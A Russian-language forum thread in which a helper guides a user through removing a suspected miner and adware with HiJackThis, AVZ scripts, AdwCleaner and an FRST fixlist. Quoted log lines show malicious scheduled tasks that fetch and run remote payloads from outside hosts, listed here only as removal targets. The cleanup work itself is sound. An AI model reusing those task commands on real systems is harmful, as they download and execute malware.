svchost.exe 50% нагрузка на ЦП

[Илья Болдырев]

Я уже не знаю, что делать. Пытаюсь забить в поисковике браузера какую нибудь программу, чтобы увидеть за что отвечает процесс svchost с ID 7500, но браузер тут же закрывается. Раньше с такими вирусами не сталкивался. Скорее всего, майнер. Прошу помочь. При запуске AutoLogger, появляется окошко и сразу закрывается. Никаких логов в папке нет.

Изменено 4 июня, 2018 пользователем Илья Болдырев

[SQ]

Порядок оформления запроса о помощи.

[Илья Болдырев]

Порядок оформления запроса о помощи.

Сборщик логов не работает

[SQ]

Пробовали в безопасном режиме запустить автологгер?

[Илья Болдырев]

Пробовали в безопасном режиме запустить автологгер?

Запустил каждую утилиту по отдельности и собрал их логи в один архив. Однако, когда пытаюсь открыть папку с AVZ, рабочий стол начинает мигать и вся папка со Сборщиком закрывается. И так каждый раз.

Пробовали в безопасном режиме запустить автологгер?

Также иногда открывается вкладка в браузере с рекламой казино...

Пробовали в безопасном режиме запустить автологгер?

Прошу прощения, надо было сразу в безопасном запускать. Вот архив с логами.

CollectionLog-2018.06.04-06.43.zip

Изменено 4 июня, 2018 пользователем Илья Болдырев

[SQ]

Удалите Iobit через установку программ в панели упраления.

 

HiJackThis (из каталога autologger)профиксить

O9-32 - Button: HKLM\..\{e6be8e97-9343-42bd-9cfd-9e2e74db25d8} - (no name) - (no file)
O22 - Task: {59BF0B3A-D522-31FD-B4AF-52E1E6590D00} - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe http://net2018.net/cl/?guid=o8r4g5otkyt3sbegs4g5e9vnpdh2ew2s&prid=1&pid=4_1009_0
O22 - Task: {C1A23778-BEE6-FD6A-6AC2-C3F497CF0758} - C:\WINDOWS\Yyye.exe /q /i http://secproof.net/6d37l5swnpoq.xyo
O22 - Task: {CDD5D8F9-A723-8352-C439-739EEBB1594D} - C:\Users\ilyad\AppData\Roaming\EELC.exe /q /i http://secproof.net/kynlkbkzzble.ajb

AVZ выполнить следующий скрипт.

Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); 
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Users\ilyad\AppData\Roaming\EELC.exe','');
 QuarantineFile('C:\WINDOWS\Yyye.exe','');
 DeleteFile('C:\WINDOWS\Yyye.exe','64');
 DeleteFile('C:\Users\ilyad\AppData\Roaming\EELC.exe','64');
 ExecuteFile('schtasks.exe', '/delete /TN "{C1A23778-BEE6-FD6A-6AC2-C3F497CF0758}" /F', 0, 15000, true); 
 ExecuteFile('schtasks.exe', '/delete /TN "{CDD5D8F9-A723-8352-C439-739EEBB1594D}" /F', 0, 15000, true); 
 ExecuteFile('schtasks.exe', '/delete /TN "{59BF0B3A-D522-31FD-B4AF-52E1E6590D00}" /F', 0, 15000, true); 
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
 ExecuteRepair(9);
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

 

После перезагрузки:

- Выполните в AVZ:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.

quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com.

1. В заголовке письма напишите "Запрос на исследование вредоносного файла".

2. В письме напишите "Выполняется запрос хэлпера".

3. Прикрепите файл карантина и нажмите "Отправить"

4. Полученный ответ сообщите здесь (с указанием номера KLAN)

 

- Подготовьте лог AdwCleaner и приложите его в теме.

[Илья Болдырев]

Профиксил HiJackThis. При удалении IObit, было сказано, что возможно данная программа уже удалена. AVZ смогу сделать только в безопасном режиме. При открытии ссылки "выполнить следующий скрипт" браузер закрывается. Тоже самое происходит при открытии ссылки "AdwCleaner".

[SQ]

Профиксил HiJackThis. При удалении IObit, было сказано, что возможно данная программа уже удалена. AVZ смогу сделать только в безопасном режиме. При открытии ссылки "выполнить следующий скрипт" браузер закрывается. Тоже самое происходит при открытии ссылки "AdwCleaner".

выполните в безопасном режиме

[Илья Болдырев]

Выполнил все скрипты в AVZ. Однако, архив quarantine оказался пустой. Так должно быть? Выполнил сканирование через AdwCleaner. Вот логи.

AdwCleanerS00.txt

[SQ]

возможно указанных файлов уже нет.

 

Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.

[Илья Болдырев]

Отчет после удаления.

AdwCleanerC01.txt

[SQ]

- Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

• Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
• Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".

  

• Нажмите кнопку Scan.
• После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
• Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.

[Илья Болдырев]

Отчеты

FRST.txt

Addition.txt

[SQ]

Не используете больше одного антивируса в системе (Avast, Eset), удалите один из них. Иначе возможно проблемы с совместимостью.

• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

  CreateRestorePoint:
  CloseProcesses:
  CHR HKLM-x32\...\Chrome\Extension: [ablpcikjmhamjanpibkccdmpoekjigja] - hxxp://clients2.google.com/service/update2/crx
  CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
  OPR Extension: (Tampermonkey) - C:\Users\ilyad\AppData\Roaming\Opera Software\Opera Stable\Extensions\dhdgffkkebhmkfjojejmpbldmpobfkfo [2018-06-03]
  File: C:\WINDOWS\SysWOW64\Drivers\vduwodk5.sys
  File: C:\WINDOWS\system32\tcbres.wim
  File: C:\WINDOWS\system32\srms-apr.dat
  File: C:\WINDOWS\SysWOW64\srms-apr.dat
  2018-06-04 07:40 - 2017-12-21 17:04 - 000000000 ____D C:\Users\ilyad\AppData\LocalLow\IObit
  2018-06-04 07:40 - 2017-12-21 17:03 - 000000000 ____D C:\Users\Все пользователи\IObit
  2018-06-04 07:40 - 2017-12-21 17:03 - 000000000 ____D C:\Users\ilyad\AppData\Roaming\IObit
  2018-06-04 07:40 - 2017-12-21 17:03 - 000000000 ____D C:\ProgramData\IObit
  2018-06-04 07:40 - 2017-12-21 17:03 - 000000000 ____D C:\Program Files (x86)\IObit
  Folder: C:\Users\ilyad\3D Objects
  File: C:\Users\ilyad\AppData\Roaming\ZVfNewAnyQaAG.exe
  2018-04-12 03:34 - 2018-04-12 03:34 - 000178688 ____N (Microsoft Corporation) C:\Users\ilyad\AppData\Roaming\ZVfNewAnyQaAG.exe
  File: C:\Users\ilyad\AppData\Local\WMI.ini
  AlternateDataStreams: C:\Users\Public\AppData:CSM [480]
  FirewallRules: [{1D21456D-6EBF-40BB-AF76-E0C82A419C40}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\AutoUpdate.exe
  FirewallRules: [{094B40ED-C0C4-49C2-A070-1BE203FEE6E8}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\AutoUpdate.exe
  FirewallRules: [{5E53A729-41A2-49A0-BA8E-4FED1E3EE49F}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\DBDownloader.exe
  FirewallRules: [{3647FA04-A65E-421C-B5A0-2DE9B8D359E1}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\DBDownloader.exe
  FirewallRules: [{3ACDFBAC-E5DD-4008-A882-35BB847799ED}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\DriverBooster.exe
  FirewallRules: [{87EA0775-1AF5-4E16-B3F7-7D41DED2F8A7}] => (Allow) C:\Program Files (x86)\IObit\Driver Booster\5.3.0\DriverBooster.exe
  Reboot:
  

• Запустите FRST и нажмите один раз на кнопку Fix и подождите.
• Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
• Обратите внимание, что компьютер будет перезагружен.

[Илья Болдырев]

Лог-файл

Пользуюсь на данный момент только одним антивирусом (Avast), возможно, остались какие то файлы от ESET, так как раньше пользовался им.

Fixlog.txt